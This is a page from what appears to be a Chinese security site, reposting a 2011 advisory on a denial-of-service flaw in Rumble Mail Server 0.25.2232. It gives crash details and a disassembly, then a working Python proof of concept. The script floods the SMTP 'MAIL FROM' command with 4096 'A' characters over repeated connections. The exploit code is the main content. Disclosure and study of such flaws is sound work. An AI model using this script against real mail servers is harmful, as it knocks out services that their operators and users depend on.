首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Rumble 0.25.2232 Denial of Service Vulnerability
来源:http://www.autosectools.com/ 作者:john 发布时间:2011-03-30  

# ------------------------------------------------------------------------
# Software................Rumble 0.25.2232
# Vulnerability...........Denial Of Service
# Threat Level............Serious (3/5)
# Download................http://humbedooh.users.sourceforge.net/
# Discovery Date..........3/27/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
#
#
# --Description--
#
# A denial of service vulnerability can be exploited to crash Rumble
# Mail Server v0.25.2231.
#
# rumble_win32.exe: The instruction at 0x96CEEB referenced memory at
# 0x41414149. The memory could not be read (0x0096CEEB -> 41414149)
#
# Disassembly:
#
# .text:0096CEEB mov     edx, [ecx+8]
# .text:0096CEEE mov     [ebp-8], edx
# .text:0096CEF1 mov     eax, [ebp-8]
# .text:0096CEF4 mov     ecx, [eax]
# .text:0096CEF6 mov     [ebp-0Ch], ecx
# .text:0096CEF9 mov     edx, [ebp+0Ch]
# .text:0096CEFC mov     [ebp-10h], edx
# .text:0096CEFF
# .text:0096CEFF loc_96CEFF:                             ; CODE XREF: .text:0096CF31
# .text:0096CEFF mov     eax, [ebp-10h]
# .text:0096CF02 mov     cl, [eax]
# .text:0096CF04 mov     [ebp-11h], cl
# .text:0096CF07 mov     edx, [ebp-0Ch]
# .text:0096CF0A cmp     cl, [edx]
# .text:0096CF0C jnz     short loc_96CF3C
#
#
# --PoC--

import socket

host = 'localhost'
tld = 'mydomain.tld'
port = 25

def crash():   
 for i in range(0, 16):
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((host, port))
  s.settimeout(32)   
 
  junk = 'A' * 4096
 
  print s.recv(8192)
  s.send('HELO ' + tld + '\r\n')
  print s.recv(8192)
  s.send('MAIL FROM ' + junk + '\r\n')
  print s.recv(8192)
 
  s.close()
 

crash()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·jHTTPd 0.1a Directory Traversa
·GOM Player 2.1.28.5039 - AVI D
·IDEAL Administration 2011 v11.
·Windows Explorer 6.0.2900.5512
·Easy File Sharing Web Server 5
·Winamp 5.61 - AVI DoS PoC
·Distributed Ruby Send instance
·Easy File Sharing Web Server 5
·Mozilla Firefox Crash Handler
·Solaris 10 Port Stealing
·Konqueror KDE 3.5 Crash Handle
·Media Player Classic Home Cine
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved